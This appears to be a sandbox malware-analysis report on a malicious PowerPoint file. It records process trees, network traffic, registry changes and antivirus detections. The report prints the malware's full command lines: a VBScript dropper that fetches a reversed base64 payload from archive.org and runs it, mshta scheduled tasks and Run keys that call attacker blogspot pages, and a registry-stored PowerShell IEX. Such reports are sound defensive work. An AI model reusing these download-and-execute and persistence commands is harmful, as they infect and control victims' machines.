Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | April 14, 2021, 6:05 p.m. | April 14, 2021, 6:07 p.m. |
-
POWERPNT.EXE "C:\Program Files (x86)\Microsoft Office\Office12\POWERPNT.EXE" /S "C:\Users\test22\AppData\Local\Temp\Company profile.ppt"
2332-
-
schtasks.exe "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\")
2672 -
cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs
1808-
wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\SiggiaW.vbs"
2668
-
-
cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe
1932-
taskkill.exe taskkill /f /im winword.exe
1916 -
taskkill.exe taskkill /f /im EXCEL.exe
1124
-
-
-
Suricata Alerts
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49211 172.217.31.233:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 38:94:3b:5a:12:31:3f:33:76:c6:d4:70:c0:80:73:0d:ed:92:30:ea |
TLSv1 192.168.56.101:49209 216.58.197.105:443 |
None | None | None |
TLSv1 192.168.56.101:49208 216.58.197.105:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 38:94:3b:5a:12:31:3f:33:76:c6:d4:70:c0:80:73:0d:ed:92:30:ea |
TLSv1 192.168.56.101:49221 207.241.228.148:443 |
C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 | OU=Domain Control Validated, CN=*.us.archive.org | 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0 |
TLSv1 192.168.56.101:49222 207.241.228.143:443 |
C=US, ST=Arizona, L=Scottsdale, O=GoDaddy.com, Inc., OU=http://certs.godaddy.com/repository/, CN=Go Daddy Secure Certificate Authority - G2 | OU=Domain Control Validated, CN=*.us.archive.org | 9c:3c:d6:6d:65:69:f2:95:8c:99:48:e3:e0:7f:14:38:36:4c:ba:d0 |
TLSv1 192.168.56.101:49210 172.217.31.233:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=*.blogger.com | 38:94:3b:5a:12:31:3f:33:76:c6:d4:70:c0:80:73:0d:ed:92:30:ea |
TLSv1 192.168.56.101:49206 216.58.220.193:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=misc-sni.blogspot.com | f0:64:7d:39:9a:3a:49:e8:7f:12:e6:d1:96:cb:9b:65:6d:43:4a:52 |
suspicious_features | GET method with no useragent header | suspicious_request | GET https://ia801403.us.archive.org/0/items/divine2_20210411_1858/divine2.txt |
request | GET http://j.mp/guwkqbhskagshjtyuiwqbh |
request | GET https://ajmeinthakahowahun.blogspot.com/p/divine2222.html |
request | GET https://www.blogger.com/static/v1/widgets/3416767676-css_bundle_v2.css |
request | GET https://www.blogger.com/static/v1/jsbin/1277698886-ieretrofit.js |
request | GET https://www.blogger.com/dyn-css/authorization.css?targetBlogID=9202096335134795169&zx=40a67cbf-2c8f-4258-a13a-81794be5b191 |
request | GET https://www.blogger.com/static/v1/jsbin/3858658042-comment_from_post_iframe.js |
request | GET https://www.blogger.com/static/v1/widgets/1893845785-widgets.js |
request | GET https://resources.blogblog.com/img/icon18_edit_allbkg.gif |
request | GET https://resources.blogblog.com/img/icon18_wrench_allbkg.png |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/body_gradient_tile_light.png |
request | GET https://resources.blogblog.com/blogblog/data/1kt/simple/gradients_light.png |
request | GET https://www.blogger.com/img/share_buttons_20_3.png |
request | GET https://ia801408.us.archive.org/25/items/defender_202103/defender.txt |
request | GET https://ia801403.us.archive.org/0/items/divine2_20210411_1858/divine2.txt |
description | POWERPNT.EXE tried to sleep 139 seconds, actually delayed analysis time by 139 seconds |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTDTA402\1893845785-widgets[1].js |
file | C:\Users\Public\SiggiaW.vbs |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\BYECVYBT\1277698886-ieretrofit[1].js |
file | C:\Users\test22\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZTY94C7J\3858658042-comment_from_post_iframe[1].js |
cmdline | schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\") |
cmdline | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
cmdline | MsHTa HTTp://j.mp/guwkqbhskagshjtyuiwqbh |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "EXCEL.exe") |
wmi | SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = "winword.exe") |
description | Affect system registries | rule | win_registry | ||||||
description | Affect system token | rule | win_token | ||||||
description | Affect private profile | rule | win_private_profile | ||||||
description | Affect private profile | rule | win_files_operation | ||||||
description | (no description) | rule | DebuggerCheck__GlobalFlags | ||||||
description | (no description) | rule | DebuggerCheck__QueryInfo | ||||||
description | (no description) | rule | DebuggerHiding__Thread | ||||||
description | (no description) | rule | DebuggerHiding__Active | ||||||
description | (no description) | rule | ThreadControl__Context | ||||||
description | (no description) | rule | SEH__vectored | ||||||
description | Checks if being debugged | rule | anti_dbg | ||||||
description | Bypass DEP | rule | disable_dep |
cmdline | schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\") |
cmdline | cmd /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |
cmdline | taskkill /f /im winword.exe |
cmdline | "C:\Windows\System32\cmd.exe" /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
cmdline | taskkill /f /im EXCEL.exe |
cmdline | "C:\Windows\System32\cmd.exe" /c taskkill /f /im winword.exe & taskkill /f /im EXCEL.exe |
cmdline | cMd /c cd C:\Users\Public &@echo dim http_obj >>SiggiaW.vbs &@echo dim stream_obj >>SiggiaW.vbs &@echo dim shell_obj >>SiggiaW.vbs &@echo set http_obj = CreateObject("Microsoft.XMLHTTP") >>SiggiaW.vbs &@echo set stream_obj = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo set shell_obj = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo URL = "https://ia801408.us.archive.org/25/items/defender_202103/defender.txt" >>SiggiaW.vbs &@echo http_obj.open "GET", URL, False >>SiggiaW.vbs &@echo http_obj.send >>SiggiaW.vbs &@echo stream_obj.type = 1 >>SiggiaW.vbs &@echo stream_obj.open >>SiggiaW.vbs &@echo stream_obj.write http_obj.responseBody >>SiggiaW.vbs &@echo stream_obj.savetofile "C:\Users\Public\1.txt", 2 >>SiggiaW.vbs &@echo Dim xxx >>SiggiaW.vbs &@echo Set xxx = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set file = xxx.OpenTextFile("C:\Users\Public\1.txt", 1) >>SiggiaW.vbs &@echo content = file.ReadAll >>SiggiaW.vbs &@echo content = StrReverse(content) >>SiggiaW.vbs &@echo Dim fso >>SiggiaW.vbs &@echo Dim fdsafdsa >>SiggiaW.vbs &@echo Dim oNode, fdsaa >>SiggiaW.vbs &@echo Const adTypeBinary = 1 >>SiggiaW.vbs &@echo Const adSaveCreateOverWrite = 2 >>SiggiaW.vbs &@echo Set oNode = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64") >>SiggiaW.vbs &@echo oNode.dataType = "bin.base64" >>SiggiaW.vbs &@echo oNode.Text = content >>SiggiaW.vbs &@echo Set fdsaa = CreateObject("ADODB.Stream") >>SiggiaW.vbs &@echo fdsaa.Type = adTypeBinary >>SiggiaW.vbs &@echo tempdir = CreateObject("WScript.Shell").ExpandEnvironmentStrings("C:\Users\Public\bin.vbs") >>SiggiaW.vbs &@echo LocalFile = tempdir >>SiggiaW.vbs &@echo fdsaa.Open >>SiggiaW.vbs &@echo fdsaa.Write oNode.nodeTypedValue >>SiggiaW.vbs &@echo fdsaa.SaveToFile LocalFile, adSaveCreateOverWrite >>SiggiaW.vbs &@echo Set fso = CreateObject("Scripting.FileSystemObject") >>SiggiaW.vbs &@echo Set fdsafdsa = CreateObject("WScript.Shell") >>SiggiaW.vbs &@echo If (fso.FileExists(LocalFile)) Then >>SiggiaW.vbs &@echo fdsafdsa.RUN (LocalFile) >>SiggiaW.vbs &@echo End If>>SiggiaW.vbs& SiggiaW.vbs &dEl SiggiaW.vbs |
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\") |
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\DLESOLCRETSAM | reg_value | mshta vbscript:Execute("CreateObject(""Wscript.Shell"").Run ""powershell ((gp HKCU:\Software).MSOFFICELO)|IEX"", 0 : window.close") | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\dkkkksakdosexography | reg_value | "mshta""http://1230948%1230948@backbones1234511a.blogspot.com/p/divinefriend1backup.html" | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\(Default) | reg_value | "mshta""http://1230948%1230948@startthepartyup.blogspot.com/p/backbone15.html" | ||||||
reg_key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\nunukhaoo | reg_value | "mshta""http://1230948%1230948@ghostbackbone123.blogspot.com/p/ghostbackup14.html" | ||||||
cmdline | schtasks /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\") | ||||||||
cmdline | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@randikhanaekminar.blogspot.com/p/divinefriend1.html""\"", 0 : window.close"\") |
file | C:\Users\Public\SiggiaW.vbs |
registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2796BAE63F1801E277261BA0D77770028F20EEE4\Blob |
parent_process | powerpnt.exe | martian_process | MsHTa HTTp://j.mp/guwkqbhskagshjtyuiwqbh |
file | C:\Windows\SysWOW64\wscript.exe |
FireEye | VB:Trojan.Valyria.4194 |
Cyren | PP97M/Agent.UA.gen!Eldorado |
Symantec | Trojan.Gen.NPE |
ESET-NOD32 | a variant of VBA/TrojanDownloader.Agent.VWV |
TrendMicro-HouseCall | TROJ_FRS.VSNTDE21 |
Avast | Script:SNH-gen [Trj] |
Kaspersky | UDS:DangerousObject.Multi.Generic |
BitDefender | VB:Trojan.Valyria.4194 |
MicroWorld-eScan | VB:Trojan.Valyria.4194 |
Rising | Malware.ObfusVBA@ML.92 (VBA) |
Ad-Aware | VB:Trojan.Valyria.4194 |
Emsisoft | VB:Trojan.Valyria.4194 (B) |
Ikarus | Trojan-Downloader.VBA.Agent |
Microsoft | TrojanDownloader:O97M/EncDoc.VIS!MTB |
AegisLab | Trojan.Script.Generic.4!c |
GData | VB:Trojan.Valyria.4194 |
MAX | malware (ai score=89) |
Fortinet | VBA/Agent.4194!tr |
AVG | Script:SNH-gen [Trj] |
Qihoo-360 | virus.office.qexvmc.1065 |